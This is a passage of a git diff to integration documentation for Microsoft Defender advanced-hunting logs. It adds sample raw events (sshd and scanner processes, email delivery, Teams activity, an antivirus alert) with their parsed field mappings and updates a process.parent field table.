"1111111111111111111111111111111111111111", + "name": "domain" + }, + "microsoft": { + "defender": { + "report": { + "id": "413706" + } + } + }, + "process": { + "args": [ + "-D", + "-R", + "-oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa", + "-oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc", + "-oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1-", + "-oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com", + "-oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1", + "-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512", + "-oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com" + ], + "command_line": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "executable": "/usr/sbin/sshd", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "sshd", + "parent": { + "name": "sshd", + "pid": 3653343, + "start": "2024-11-18T10:07:20.290000Z" + }, + "pid": 3653343, + "start": "2024-11-18T10:07:20.293930Z", + "user": { + "domain": "domain", + "name": "root" + }, + "working_directory": "/usr/sbin" + }, + "related": { + "hash": [ + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account" + ] + }, + "user": { + "domain": "domain", + "name": "account" + } + } + + ``` + + === "test_device_network_connection.json" ```json @@ -1716,6 +2321,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "InitiatingProcessVersionInfoProductVersion": "4.18.2301.6", "LogonId": "999", "ProcessIntegrityLevel": "System", + "ProcessTokenElevation": "TokenElevationTypeDefault", "ProcessVersionInfoCompanyName": "Microsoft Corporation", "ProcessVersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", "ProcessVersionInfoInternalFileName": "MpCmdRun", @@ -1755,31 +2361,33 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "54", "Scan" ], - "code_signature": { - "status": "Valid", - "subject_name": "OsVendor" - }, "command_line": "\"MpCmdRun.exe\" Scan -ScheduleJob -RestrictPrivileges -DailyScan -ScanTrigger 54", - "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", - "hash": { - "md5": "5d5608654828cf052ba013b3c37cbb61", - "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", - "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" - }, - "name": "MsMpEng.exe", + "name": "MpCmdRun.exe", "parent": { - "name": "services.exe", - "pid": 1032, - "start": "2023-01-03T08:51:26.740241Z" + "code_signature": { + "status": "Valid", + "subject_name": "OsVendor" + }, + "command_line": "\"MsMpEng.exe\"", + "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", + "hash": { + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", + "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" + }, + "name": "MsMpEng.exe", + "pid": 5456, + "start": "2023-01-03T08:51:29.269279Z", + "user": { + "domain": "NT", + "id": "S-1-1-11", + "name": "System" + }, + "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" }, "pid": 37788, "start": "2023-01-04T14:15:10.355033Z", - "user": { - "domain": "NT", - "id": "S-1-1-11", - "name": "System" - }, - "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" + "working_directory": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2301.6-0" }, "related": { "hash": [ @@ -1854,20 +2462,23 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "-o", "comm,pid,pcpu,pmem,rss,etimes" ], - "code_signature": { - "status": "Unknown", - "subject_name": "Unknown" - }, "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers", + "name": "ps", "parent": { - "pid": 0 + "code_signature": { + "status": "Unknown", + "subject_name": "Unknown" + }, + "pid": 423627, + "start": "2024-10-22T15:09:44.590000Z", + "user": { + "domain": "computer", + "name": "root" + } }, "pid": 423627, "start": "2024-10-22T15:09:44.594155Z", - "user": { - "domain": "computer", - "name": "root" - } + "working_directory": "/usr/bin" }, "related": { "hash": [ @@ -2089,6 +2700,152 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_email_delivered.json" + + ```json + + { + "message": "{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:40Z", + "action": { + "properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + "DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "3162398878", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "company.com", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@company.com" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<1@eu-west-1.test.com>", + "subject": "MAIL subject", + "to": { + "address": [ + "alan.smithee@company.com" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } + + ``` + + +=== "test_email_delivered2.json" + + ```json + + { + "message": "{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + "DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "2633942188", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "test.fr", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@test.fr" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<20241028141819.43623347A8F@test.fr>", + "subject": "EMAIL Subject", + "to": { + "address": [ + "alan.smithee@test.fr" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } + + ``` + + === "test_email_events.json" ```json @@ -2193,7 +2950,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<01020192520c9bb4-8a4c9d72-a832-47b9-a13f-ce92d3da71ba-000000@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "action": "Moved to quarantine", "category": [ @@ -2583,7 +3340,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1-5-21-2308620423-2764619233-3639949770-5127445\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "category": [ "iam" @@ -3187,30 +3944,36 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "-F", "smtpd_tls_protocols\\commandtest" ], - "code_signature": { - "status": "Unknown", - "subject_name": "Unknown" - }, "command_line": "grep -F smtpd_tls_protocols\\commandtest", - "executable": "/usr/test/platform-python3.6", - "hash": { - "md5": "eeeee2999444ddaaaaa08598b06eafe7", - "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6", - "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565" - }, - "name": "platform-python3.6", + "name": "grep", "parent": { + "args": [ + "--register", + "/usr/lib/python3.6/run.py" + ], + "code_signature": { + "status": "Unknown", + "subject_name": "Unknown" + }, + "command_line": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", + "executable": "/usr/test/platform-python3.6", + "hash": { + "md5": "eeeee2999444ddaaaaa08598b06eafe7", + "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6", + "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565" + }, "name": "platform-python3.6", - "pid": 408229, - "start": "2024-09-24T14:17:34.790000Z" + "pid": 408996, + "start": "2024-09-24T14:18:11.850000Z", + "user": { + "domain": "testdomain", + "name": "testaccount" + }, + "working_directory": "/usr/test" }, "pid": 408996, "start": "2024-09-24T14:18:11.864114Z", - "user": { - "domain": "testdomain", - "name": "testaccount" - }, - "working_directory": "/usr/test" + "working_directory": "/usr/bin" }, "related": { "hash": [ @@ -3476,17 +4239,26 @@ The following table lists the fields that are extracted, normalized under the EC |`microsoft.defender.threat.types` | `keyword` | Verdict from the email filtering stack on whether the email contains malware, phishing, or other threats | |`network.protocol` | `keyword` | Application protocol name. | |`process.args` | `keyword` | Array of process arguments. | -|`process.code_signature.status` | `keyword` | Additional information about the certificate status. | -|`process.code_signature.subject_name` | `keyword` | Subject name of the code signer | |`process.command_line` | `wildcard` | Full command line that started the process. | |`process.executable` | `keyword` | Absolute path to the process executable. | |`process.hash.md5` | `keyword` | MD5 hash. | |`process.hash.sha1` | `keyword` | SHA1 hash. | |`process.hash.sha256` | `keyword` | SHA256 hash. | |`process.name` | `keyword` | Process name. | +|`process.parent.args` | `keyword` | Array of process arguments. | +|`process.parent.code_signature.status` | `keyword` | Additional information about the certificate status. | +|`process.parent.code_signature.subject_name` | `keyword` | Subject name of the code signer | +|`process.parent.command_line` | `wildcard` | Full command line that started the process. | +|`process.parent.executable` | `keyword` | Absolute path to the process executable. | +|`process.parent.hash.md5` | `keyword` | MD5 hash. | +|`process.parent.hash.sha1` | `keyword` | SHA1 hash. | +|`process.parent.hash.sha256` | `keyword` | SHA256 hash. | |`process.parent.name` | `keyword` | Process name. | |`process.parent.pid` | `long` | Process id. | |`process.parent.start` | `date` | The time the process started. | +|`process.parent.user.domain` | `keyword` | | +|`process.parent.user.email` | `keyword` | | +|`process.parent.working_directory` | `keyword` | The working directory of the process. | |`process.pid` | `long` | Process id. | |`process.start` | `date` | The time the process started. | |`process.user.domain` | `keyword` | Domain of the account that ran the process responsible for the event | diff --git a/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f_sample.md b/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f_sample.md index ec7685a3f..f130e1e09 100644 --- a/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f_sample.md +++ b/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f_sample.md @@ -622,6 +622,99 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_cloud_app4" + + + ```json + { + "time": "2024-10-28T14:24:31.9854915Z", + "tenantId": "12345678-abcd-ef09-1234-123456abcdef", + "operationName": "Publish", + "category": "AdvancedHunting-CloudAppEvents", + "_TimeReceivedBySvc": "2024-10-28T14:20:30.0960000Z", + "properties": { + "ActionType": "MessageReadReceiptReceived", + "ApplicationId": 28375, + "AccountDisplayName": "John DOE", + "AccountObjectId": "abcd1234-1234-1234-1234-abcdef123456", + "AccountId": "abcd1234-1234-1234-1234-abcdef123456", + "DeviceType": null, + "OSPlatform": null, + "IPAddress": null, + "IsAnonymousProxy": null, + "CountryCode": null, + "City": null, + "ISP": null, + "UserAgent": null, + "IsAdminOperation": false, + "ActivityObjects": [ + { + "Type": "Structured object", + "Role": "Parameter", + "ServiceObjectType": "Microsoft Team" + }, + { + "Type": "User", + "Role": "Actor", + "Name": "John DOE", + "Id": "abcd1234-1234-1234-1234-abcdef123456", + "ApplicationId": 11161, + "ApplicationInstance": 0 + } + ], + "AdditionalFields": {}, + "ActivityType": "Basic", + "ObjectName": null, + "ObjectType": null, + "ObjectId": null, + "AppInstanceId": 0, + "AccountType": "Regular", + "IsExternalUser": false, + "IsImpersonated": false, + "IPTags": null, + "IPCategory": null, + "UserAgentTags": null, + "RawEventData": { + "ChatThreadId": "19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com", + "CommunicationType": "GroupChat", + "CreationTime": "2024-10-28T14:18:38Z", + "ExtraProperties": [], + "Id": "abcd1234-ef09-1234-abcd-123456abcdef", + "ItemName": "19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com", + "MessageId": "1730125116564", + "MessageVersion": "0", + "MessageVisibilityTime": "2022-09-21T08:33:35Z", + "Operation": "MessageReadReceiptReceived", + "OrganizationId": "12345678-abcd-ef09-1234-123456abcdef", + "ParticipantInfo": { + "HasForeignTenantUsers": false, + "HasGuestUsers": false, + "HasOtherGuestUsers": false, + "HasUnauthenticatedUsers": false, + "ParticipatingDomains": [], + "ParticipatingSIPDomains": [], + "ParticipatingTenantIds": [ + "12345678-abcd-ef09-1234-123456abcdef" + ] + }, + "RecordType": 25, + "ResourceTenantId": "12345678-abcd-ef09-1234-123456abcdef", + "UserId": "john.doe@company.fr", + "UserKey": "abcd1234-1234-1234-1234-abcdef123456", + "UserType": 0, + "Version": 1, + "Workload": "MicrosoftTeams" + }, + "ReportId": "98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef", + "Timestamp": "2024-10-28T14:18:38Z", + "Application": "Microsoft Teams" + }, + "Tenant": "DefaultTenant" + } + ``` + + + === "test_connection_acknowledged" @@ -748,7 +841,188 @@ In this section, you will find examples of raw logs as generated natively by the -=== "test_deivce_events_2" +=== "test_detection_source" + + + ```json + { + "time": "2022-09-02T22:06:00.6652718Z", + "tenantId": "16ed4fbf-027f-47b3-8d1a-a342781dd2d2", + "operationName": "Publish", + "category": "AdvancedHunting-AlertInfo", + "properties": { + "AlertId": "da637977531594995313_968283104", + "Timestamp": "2022-09-02T22:04:16.134644Z", + "Title": "'Lodi' unwanted software was prevented", + "ServiceSource": "Microsoft Defender for Endpoint", + "Category": "DefenseEvasion", + "Severity": "Informational", + "DetectionSource": "Antivirus", + "MachineGroup": "Windows 10 - remediate threats automatically", + "AttackTechniques": "" + } + } + ``` + + + +=== "test_device_event" + + + ```json + { + "time": "2022-09-01T07:28:59.5127177Z", + "tenantId": "5ac3ff49-0e19-4600-9ad1-333e64e3b5cc", + "operationName": "Publish", + "category": "AdvancedHunting-DeviceEvents", + "properties": { + "AccountSid": null, + "AccountDomain": null, + "AccountName": null, + "LogonId": null, + "FileName": null, + "FolderPath": null, + "MD5": null, + "SHA1": null, + "FileSize": null, + "SHA256": null, + "ProcessCreationTime": null, + "ProcessTokenElevation": null, + "RemoteUrl": null, + "RegistryKey": null, + "RegistryValueName": null, + "RegistryValueData": null, + "RemoteDeviceName": null, + "FileOriginIP": null, + "FileOriginUrl": null, + "LocalIP": "1.2.3.4", + "LocalPort": null, + "RemoteIP": "5.6.7.8", + "RemotePort": null, + "ProcessId": null, + "ProcessCommandLine": null, + "AdditionalFields": "{\"BaseAddress\":2098738167808,\"RegionSize\":262144,\"ProtectionMask\":64}", + "ActionType": "NtAllocateVirtualMemoryApiCall", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessFolderPath": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe", + "InitiatingProcessFileName": "software_reporter_tool.exe", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessMD5": "51a9cac9c4e8da44ffd7502be17604ee", + "InitiatingProcessSHA256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "InitiatingProcessSHA1": "44543e0c6f30415c670c1322e61ca68602d58708", + "InitiatingProcessLogonId": 121834210, + "InitiatingProcessAccountSid": "S-1-00-1-1111111-2222222222-3333333333-4444444444", + "InitiatingProcessAccountDomain": "intranet", + "InitiatingProcessAccountName": "group1", + "InitiatingProcessAccountUpn": "user@example.org", + 